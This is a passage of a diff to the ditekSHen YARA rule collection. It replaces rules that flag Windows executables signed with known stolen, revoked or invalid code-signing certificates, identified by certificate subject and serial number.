-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TORG-ALYANS, LLC" and pe.signatures [ i ] . serial == "08:4b:6f:19:89:82:14:a0:2a:5f:32:e6:ea:69:f0:fd" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FDSMMCME" and pe.signatures [ i ] . serial == "fd:b6:f4:c0:9a:1a:d6:9d:4f:d2:e4:6b:b1:f5:43:13" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_24C1Ef800F275Ab2780280C595De3464 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_E5Bf5B5C0880Db96477C24C18519B9B9 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "0bd14ac3-9761-5ac4-8cdc-6212a92c5b5d"
+		id = "a28dbf8f-1b30-525d-baaf-51342aaf1cb3"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5910-L5921"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L733-L744"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "773fdb6d15a5bd1282dd9a48601b453b62de2e9832822858ad750c6462d6e116"
+		logic_hash = "b3e0401a9cf3005abac24114193f34bf439107bf6661b7c2c0b66ca91438c7b9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "836b81154eb924fe741f50a21db258da9b264b85"
+		thumbprint = ""
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HOLGAN LIMITED" and pe.signatures [ i ] . serial == "24:c1:ef:80:0f:27:5a:b2:78:02:80:c5:95:de:34:64" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WATWGHFC" and pe.signatures [ i ] . serial == "e5:bf:5b:5c:08:80:db:96:47:7c:24:c1:85:19:b9:b9" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_6401831B46588B9D872B02076C3A7B00 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ede6Cfbf9Fa18337B0Fdb49C1F693020 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "d651bbe4-7e50-51bc-8f96-a78b11846699"
+		id = "f1f34147-132e-53a3-b82c-d98121fc3f2c"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5923-L5934"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L746-L757"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9a90c9d51dd6eb37bb3b6b17c5e3e5ebb6b6922efa14e3d8d60e72bcdb7b7259"
+		logic_hash = "27f06a7a07b818fd34f5d23fd8e78f041063e035c1f8caa99aaaf53ec73a717a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "19fc95ac815865e8b57c80ed21a22e2c0fecc1ff"
+		thumbprint = "a99b52e0999990c2eb24d1309de7d4e522937080"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ACTIV GROUP ApS" and pe.signatures [ i ] . serial == "64:01:83:1b:46:58:8b:9d:87:2b:02:07:6c:3a:7b:00" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "START ARCHITECTURE LTD" and pe.signatures [ i ] . serial == "00:ed:e6:cf:bf:9f:a1:83:37:b0:fd:b4:9c:1f:69:30:20" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0Cf1Ed2A6Ff4Bee621Efdf725Ea174B7 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_4F407Eb50803845Cc43937823E1344C0 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "f3cb7bd9-9e28-5478-b65d-60915157dd3b"
+		id = "d5a6df76-bbbc-5025-b0c4-49e0034c03f3"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5936-L5947"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L759-L770"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2902b075f40f1413eee937c045e082a3141ec309f9d8e1dfd3a384050ea0776c"
+		logic_hash = "bb01e912cf40155b0b00e1901bbb3235048ee033d0ddea7a809f0ce8e871e1ce"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e33dc0787099d92a712894cfef2aaba3f0d65359"
+		thumbprint = "0c1ffe7df27537a3dccbde6f7a49e38c4971e852"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LEVEL LIST SP Z O O" and pe.signatures [ i ] . serial == "0c:f1:ed:2a:6f:f4:be:e6:21:ef:df:72:5e:a1:74:b7" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLOW COOKED VENTURES LTD" and pe.signatures [ i ] . serial == "4f:40:7e:b5:08:03:84:5c:c4:39:37:82:3e:13:44:c0" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_7Ed801843Fa001B8Add52D3A97B25931 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_2Bffef48E6A321B418041310Fdb9B0D0 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "8dc9fbde-57bb-56ca-b925-902059612606"
+		id = "fc945c76-b743-52d3-8e15-77afdc629f6d"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5949-L5960"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L785-L796"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2607dde1318b9b84056fc73664e4c1f82f20c23f311216e2201c3fdee0d1b6db"
+		logic_hash = "8d0223b6366f7bc22fd6dd053c1fb6c9e52f80b3bdf9ee46017ddf038bd1e00f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4ee1539c1455f0070d8d04820fb814f8794f84df"
+		thumbprint = "c40c5157e96369ceb7e26e756f2d1372128cee7b"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AM El-Teknik ApS" and pe.signatures [ i ] . serial == "7e:d8:01:84:3f:a0:01:b8:ad:d5:2d:3a:97:b2:59:31" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "A&D DOMUS LIMITED" and pe.signatures [ i ] . serial == "2b:ff:ef:48:e6:a3:21:b4:18:04:13:10:fd:b9:b0:d0" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0F0Ed5318848703405D40F7C62D0F39A : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_73B60719Ee57974447C68187E49969A2 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "6baebaa7-275c-571d-b321-9a21d7799a33"
+		id = "c72fb0b8-efdc-5734-9754-2289bd95ae3c"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5962-L5973"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L798-L809"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "77bd8fd2dc48e2fc8abbf0f3411dfa8010326b6a9928fb392cce6e0fe8e9d309"
+		logic_hash = "f9cc0f526a3acbfc30c6b76b6705f1a2d9c905b9bb7c996e4db3ca6d4d63be1c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ed91194ee135b24d5df160965d8036587d6c8c35"
+		thumbprint = "8e50ddad9fee70441d9eb225b3032de4358718dc"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SIES UPRAVLENIE PROTSESSAMI, OOO" and pe.signatures [ i ] . serial == "0f:0e:d5:31:88:48:70:34:05:d4:0f:7c:62:d0:f3:9a" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIT HORIZON LIMITED" and pe.signatures [ i ] . serial == "73:b6:07:19:ee:57:97:44:47:c6:81:87:e4:99:69:a2" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_537Aa4F1Bae48F052C3E57C3E2E1Ee61 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_2925263B65C7Fe1Cd47B0851Cc6951E3 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "33316c5e-b14f-50b5-8971-3a8b5a3c2497"
+		id = "9e531592-b68c-550b-8609-51f7c9ac63ae"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5975-L5986"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L811-L822"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "83d205998f43a2404146064e13726c149bc56fed6b886ee1812378c027f03da0"
+		logic_hash = "163293ce805cdd3ec265fb9c527a5ce19ddab0f6b96355acb636c941ce0bc5f2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "15355505a242c44d6c36abab6267cc99219a931c"
+		thumbprint = "88ef10f0e160b1b4bb8f0777a012f6b30ac88ac8"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALPHA AME LIMITED LLP" and pe.signatures [ i ] . serial == "53:7a:a4:f1:ba:e4:8f:05:2c:3e:57:c3:e2:e1:ee:61" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "tuning buddy limited" and pe.signatures [ i ] . serial == "29:25:26:3b:65:c7:fe:1c:d4:7b:08:51:cc:69:51:e3" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_61B11Ef9726Ab2E78132E01Bd791B336 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_4Ff4Eda5Fa641E70162713426401F438 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "5b830ab1-16d2-573c-81b7-b8b922af6f4b"
+		id = "cc81ed1d-bd77-5cec-8bee-23e8ef448edc"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5988-L5999"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L824-L835"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "50c89d732409ff680734f481d858256001245c10345d9e6f1cbb51dcdc9c2cc9"
+		logic_hash = "d08e12e74e9c0b7a89ffa81a1b8595953d857e571a5b7a6947eba18bf39610f6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9f7fcfd7e70dd7cd723ac20e5e7cb7aad1ba976b"
+		thumbprint = "a6277cc8fce0f90a1909e6dac8b02a5115dafb40"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Skalari" and pe.signatures [ i ] . serial == "61:b1:1e:f9:72:6a:b2:e7:81:32:e0:1b:d7:91:b3:36" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DUHANEY LIMITED" and pe.signatures [ i ] . serial == "4f:f4:ed:a5:fa:64:1e:70:16:27:13:42:64:01:f4:38" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_E339C8069126Aa6313484Fea85B4B326F7B8860C : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_04C7Cdcc1698E25B493Eb4338D5E2F8B : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "a8a6a285-98e1-5a2a-ab89-c67809fea3b2"
+		id = "446608c2-4c9e-56a9-8ac4-2c90397d68e5"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6001-L6012"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L837-L848"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6f373c5a8f99893088fa1afffeccdf24ae6ed118d7bea9df43281073bd8e85bb"
+		logic_hash = "d1e81d040a279d6024989acbdd40f69de99c97baf789591400370806e846a1c4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e339c8069126aa6313484fea85b4b326f7b8860c"
+		thumbprint = "60974f5cc654e6f6c0a7332a9733e42f19186fbb"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Germany classer software" and pe.signatures [ i ] . serial == "01" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3AN LIMITED" and pe.signatures [ i ] . serial == "04:c7:cd:cc:16:98:e2:5b:49:3e:b4:33:8d:5e:2f:8b" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_734D0Baf7A6B44743Ff852C8Ba7A751A7Ff0Ec73 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_4C450Eccd61D334E0Afb2B2D9Bb1D812 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "1dc06f6e-2152-516a-b9cc-0d95c098c88f"
+		id = "116c86c1-facf-5b69-94f1-3f0f81c38a7d"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6031-L6042"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L850-L861"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "54620c58bae2c2f9859916a58b0fef4310dd27fdada663c28bb7d58bdaefc7c5"
+		logic_hash = "70851d76af4a4dfe8f1ca4de9925f030d9b937050876828775b78eddd123e3cd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "734d0baf7a6b44743ff852c8ba7a751a7ff0ec73"
+		thumbprint = "4c450eccd61d334e0afb2b2d9bb1d812"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Transition software (C) 2018" and pe.signatures [ i ] . serial == "01" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ANJELA KEY LIMITED" and pe.signatures [ i ] . serial == "4c:45:0e:cc:d6:1d:33:4e:0a:fb:2b:2d:9b:b1:d8:12" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_02Fa994D660De659Ee9037Ecb437D766 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0E1Bacb85E77D355Ea69Ba0B : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "cb2aa5d6-913e-5d74-a903-1cb88fb63b1c"
+		id = "18e2dce1-c6aa-55d8-907a-75097feb7acf"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6044-L6056"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L863-L874"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		hash = "0868a2a7b5e276d3a4a40cdef994de934d33d62a689d7207a31fd57d012ef948"
-		logic_hash = "04244701311fcdc77b1e3a8f20621e474ed607be3d109c629280d528e2f24e1f"
+		logic_hash = "f0753c83001e2b9d235afe51ce5d245e085551584ee052a35aaadd95c6c5eeb7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0cb6bde041b58dbd4ec64bd5a3be38c50f17bb3d"
+		thumbprint = "6750c9224540d7606d3c82c7641f49147c1b3fd0"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Piriform Software Ltd" and pe.signatures [ i ] . serial == "02:fa:99:4d:66:0d:e6:59:ee:90:37:ec:b4:37:d7:66" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BULDOK LIMITED" and pe.signatures [ i ] . serial == "0e:1b:ac:b8:5e:77:d3:55:ea:69:ba:0b" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0B446546C36525Bf5F084F6Bbbba7097 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_5998B4Affe2Adf592E6528Ff800E567C : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "608a410d-d34f-5eea-92db-3d156d01d360"
+		id = "b81787fd-a8f1-5640-bf8a-8129f708a337"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6058-L6071"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L876-L887"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		hash = "3163ffc06848f6c48ac460ab844470ef85a07b847bf187c2c9cb26c14032a1a5"
-		logic_hash = "6dcf87b929c28cc013ee5c9de85aa026e335e1e5c38a440bc6b5dc11c6bf9a91"
+		logic_hash = "d9f589ce6367517f3c93b7b0675b19249108849e52bd9264e31bf8109e5a121f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "05cdf79b0effff361dac0363adaa75b066c49de0"
+		thumbprint = "d990d584c856bd28eab641c3c3a0f80c0b71c4d7"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TeamViewer Germany GmbH" and pe.signatures [ i ] . serial == "0b:44:65:46:c3:65:25:bf:5f:08:4f:6b:bb:ba:70:97" and 1608724800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BEAT GOES ON LIMITED" and pe.signatures [ i ] . serial == "59:98:b4:af:fe:2a:df:59:2e:65:28:ff:80:0e:56:7c" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00E4E795Fd1Fd25595B869Ce22Aa7Dc49F : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00B7E0Cf12E4Ae50Dd643A24285485602F : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "8807c05d-c13b-58e8-9dda-c2eae6b5979c"
+		id = "d314925c-c6b2-5a7f-ba73-038ea4759149"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6087-L6101"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L889-L900"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0aef5e2af3059597d218c544bc0b56078e1ef924af0530c62aa12679e0816410"
+		logic_hash = "7aefb436b7e3865b1abb6bbc3e0027a628f39e25cb4b28f35f070e000c19c1c7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "269f25e6b7c690ae094086bd7825d03b48d4fcb1"
+		thumbprint = "744160f36ba9b0b9277c6a71bf383f1898fd6d89"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OASIS COURT LIMITED" and ( pe.signatures [ i ] . serial == "00:e4:e7:95:fd:1f:d2:55:95:b8:69:ce:22:aa:7d:c4:9f" or pe.signatures [ i ] . serial == "e4:e7:95:fd:1f:d2:55:95:b8:69:ce:22:aa:7d:c4:9f" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GESO LTD" and pe.signatures [ i ] . serial == "00:b7:e0:cf:12:e4:ae:50:dd:64:3a:24:28:54:85:60:2f" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_008E0Fa6B464D466Df1B267504B04F7B27 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_767436921B2698Bd18400A24B01341B6 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "6de3aab7-7175-537b-8a33-56cb0662b7a6"
+		id = "ffd19457-1a5d-5782-89e2-3dd4090f124f"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6103-L6114"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L902-L913"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1f992d81b63108840d457f3f1906524cf4a9d4bec4a91f7bc826fae9989d40e0"
+		logic_hash = "b09ec625a06dcf90df52c56b78889f24d55dbd8cbd7d82a07bdbc842318ff19a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "91707c95044c5badcd51d198bdbe3a7ff3156c35"
+		thumbprint = "871899843b5fd100466e351ca773dac44e936939"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ApcWCjFsGXwbWUJrKZ" and pe.signatures [ i ] . serial == "00:8e:0f:a6:b4:64:d4:66:df:1b:26:75:04:b0:4f:7b:27" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REBROSE LEISURE LIMITED" and pe.signatures [ i ] . serial == "76:74:36:92:1b:26:98:bd:18:40:0a:24:b0:13:41:b6" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_559Cb90Fd16E9D1Ad375F050Ab6A6616 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_26B125E669E77A5E58Db378E9816Fbc3 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "8b2ed295-5aae-5ced-9603-8125b4e261f9"
+		id = "18985965-9e26-526c-9354-20667d472615"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6116-L6127"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L915-L926"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a91f23e2281efb95b780b26018f1c89485a87c6541ac84025dad3e6dd55c742e"
+		logic_hash = "859793bfeba55c9912a1e18db86cd391d4c4981f4be11f3a53d887d429882671"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "78a149f9a04653b01df09743571df938f9873fa5"
+		thumbprint = "900aa9e6ff07c6528ecd71400e6404682e812017"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shenzhen Smartspace Software technology Co.,Limited" and pe.signatures [ i ] . serial == "55:9c:b9:0f:d1:6e:9d:1a:d3:75:f0:50:ab:6a:66:16" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FLOWER DELI LTD" and pe.signatures [ i ] . serial == "26:b1:25:e6:69:e7:7a:5e:58:db:37:8e:98:16:fb:c3" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Eb95A7Bd7553533D : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_29A248A77D5D4066Fe5Da75F32102Bb5 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "b9198469-4eba-552d-a8f5-5841893ff85e"
+		id = "b71f4ee4-55d1-51c7-8fc3-1c6fcaa64a86"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6159-L6170"
